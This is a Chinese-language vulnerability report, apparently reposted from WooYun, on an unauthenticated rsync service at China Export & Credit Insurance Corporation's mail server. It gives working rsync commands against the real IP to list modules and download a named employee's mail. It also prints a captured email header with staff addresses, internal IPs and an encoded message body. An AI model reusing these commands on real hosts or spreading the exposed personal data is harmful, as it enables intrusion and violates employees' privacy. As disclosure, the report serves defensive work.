记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国出口信用保险公司内部邮件系统信息泄露

2014-06-06 14:50

邮件服务器(202.108.86.210) rsync 配置不当,导致外部可直接访问。

可以直接列出modules:

#/bin/bash>rsync 202.108.86.210::

0

1

2

3

4

5

6

7

8

9

a

b

c

d

e

f

eyou

eyouim

emdg

opt



所有module都无需密码访问,也未绑定ip,0到f的module中储存了所有用户的邮件存档,可任意下载。

另外可以通过Index文件夹访问收件箱、发件箱索引文件。

漏洞证明:

rsync 202.108.86.210::0/9/limw@sinosure.com.cn/Index/Inbox/.index .



2014-04-22_2-42-39.jpg





rsync 202.108.86.210::0/9/limw@sinosure.com.cn/Mail/



2014-04-22_2-44-59.jpg





看其中最新的一个邮件记录(2014.4.21):

Received: from unknown127.0.0.1 (HELO eyou.net) (127.0.0.1)

by 127.0.0.1 with SMTP; Mon, 21 Apr 2014 18:23:00 +0800

X-EYOU-SPAMVALUE:0

X-EMDG-ORIGINAL-FROM:<wangja@sinosure.com.cn>

X-EMDG-ORIGINAL-TO:<limw@sinosure.com.cn>

X-EMDG-ORIGINAL-IP:10.4.1.159

X-EMDG-VER:4.1.0

Received: (eyou anti_spam gateway 4.1.0); Mon, 21 Apr 2014 18:22:58 +0800

Message-ID: <598075778.23584@eyou.net>

X-EMDG-SMTPAUTH: wangja@sinosure.com.cn

Received: from 10.4.1.159 by 10.1.96.28 with SMTP; Mon, 21 Apr 2014 18:22:58 +0800

Date: Mon, 21 Apr 2014 18:23:24 +0800

From: wangjing <wangja@sinosure.com.cn>

To: =?GB2312?B?wO7D986w?= <limw@sinosure.com.cn>,

=?GB2312?B?1KrOsMa7?= <yuanwp@sinosure.com.cn>,

=?GB2312?B?0e69qLuq?= <yangjh@sinosure.com.cn>,

=?GB2312?B?tN69qMHW?= <cuijl@sinosure.com.cn>,

=?GB2312?B?wOjJr968?= <li_sl@sinosure.com.cn>

Subject: =?GB2312?B?16q3ojog16q3ojogobbQ0NK1t+fP1dSkvq/Qxc+iobe12jbG2i1MTke0rMrQs6GhsLnVteOhsbW9wLSjrLSstqu/ycTcw+bB2cbGsvq358/V?=

Disposition-Notification-To: wangjing <wangja@sinosure.com.cn>

X-Priority: 3

X-Has-Attach: yes

X-Mailer: Foxmail 7, 1, 3, 52[cn]

Mime-Version: 1.0

Message-ID: <2014042118232346845011@sinosure.com.cn>

Content-Type: multipart/mixed;

boundary="----=_001_NextPart061445766303_=----"



This is a multi-part message in MIME format.



------=_001_NextPart061445766303_=----

Content-Type: multipart/related;

boundary="----=_002_NextPart636570623135_=----"





------=_002_NextPart636570623135_=----

Content-Type: multipart/alternative;

boundary="----=_003_NextPart651100408022_=----"





------=_003_NextPart651100408022_=----

Content-Type: text/plain;

charset="GB2312"

Content-Transfer-Encoding: base64



DQoNCg0KDQoNCs31vrQNCtbQufqz9r/a0MXTw7Gjz9W5q8u+DQrM7L3yt9a5q8u+z+7Ev8/VudzA

7bSmDQpJUKO6NjAyOA0KDQq3orz+yMujuiDM7L3yDQq3osvNyrG85KO6IDIwMTQtMDQtMjEgMTc6

MDANCsrVvP7Iy6O6INHW19w7IMqv19w7INXF19w7INH00KGzyTsgzfW+tDsgt+vB1jsgwfW0pjsg

y++0pjsg1dTR0jsg1dTOsDsgs6O0pjsgwfW66bijDQrW98zio7og16q3ojogobbQ0NK1t+fP1dSk

vq/Qxc+iobe12jbG2i1MTke0rMrQs6GhsLnVteOhsbW9wLSjrLSstqu/ycTcw+bB2cbGsvq358/V

DQq+tMfrss7UxA0KDQoNCg0KDQrW0Ln6s/a/2tDF08Oxo8/VuavLvszsvfK31rmry74NCg0Kt6K8

/sjLo7og18rQxcbAucDW0NDEDQq3osvNyrG85KO6IDIwMTQtMDQtMjEgMTY6MjQNCsrVvP7Iy6O6

ILXa0rvTqtK1sr87ILXatv7TqtK1sr87ILXayP3TqtK1sr87IMzsvfK31rmry747ILrTsbG31rmr

y747IMm9zve31rmry747IMHJxP631rmry747IMnPuqO31rmry747IL2ty9W31rmry747INXjva23

1rmry747IMT+sqi31rmry747ILCyu9W31rmry747IM/Dw8W31rmry747IMm9tqu31rmry747ILrT

xM+31rmry747ILnjtqu31rmry747IMnu29q31rmry747IMvEtKi31rmry747INTGxM+31rmry747

IMnCzve31rmry747ILn+tvux9dOq0rW53MDtsr87IMTPsv3TqtK1udzA7bK/OyDO5Lq606rStbnc

wO2yvzsgs6TJs9Oq0rW53MDtsr87IMTPxP7TqtK1udzA7bK/OyDW2Mfs06rStbncwO2yvzsg0MK9

rteoz+6w7DsgxNrDybnF16jP7rDsOyC3otW51b3C1LK/OyDP7sS/z9W53MDtsr87IMOz0tfP1bnc

wO2yvzsgz+7Ev8/VytCzob+qt6Kyvzsgz+7Ev8/Vs9Cxo7K/OyCz9r/aw7PS18/Vs9Cxo7K/OyCz

9r/azNjP1bPQsaOyvzsgufrE2tDF08Oxo8/Vs9Cxo7K/OyC1o7Gj0rXO8bK/OyDA7cXi17ezpbK/

OyC/zbunt/7O8bK/OyDXyrL6udzA7bK/OyC5+rHw0dC+v9bQ0MQ7ILfnz9W53MDtsr8NCrOty82j

uiDN9c6w19w7IM310+7X3DsgsKzX3Dsgw7fV8LrGOyDL1c6w0N47IM31uKO88zsg1KzTwjsgs8K4

1Tsg1dTTsDsgtsW9qDsgt7a66rrGOyB3YW5neGwNCtb3zOKjuiChttDQ0rW358/V1KS+r9DFz6Kh

t7XaNsbaLUxOR7SsytCzoaGwudW146Gxtb3AtKOstKy2q7/JxNzD5sHZxsay+rfnz9UNCiANCiAg

DQoNCrj3sr/DxaO6DQoNCiAgICDH69TEztLW0NDEobbQ0NK1t+fP1dSkvq/Qxc+iobe12jbG2i1M

Tke0rMrQs6GhsLnVteOhsbW9wLSjrLSstqu/ycTcw+bB2cbGsvq358/VoaMgDQogICAgICAgICAg

ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg

ICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg

ICAgICAgICAgICAgICAgICDXytDF1tDQxA0KDQogDQog



------=_003_NextPart651100408022_=----

Content-Type: text/html;



.........



base64解密邮件主题:

2014-04-22_2-48-59.jpg



修复方案:

rsyncd.conf

list=no

设置访问密码

知识来源: www.wooyun.org/bugs/wooyun-2014-058013

阅读:2185660 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国出口信用保险公司内部邮件系统信息泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云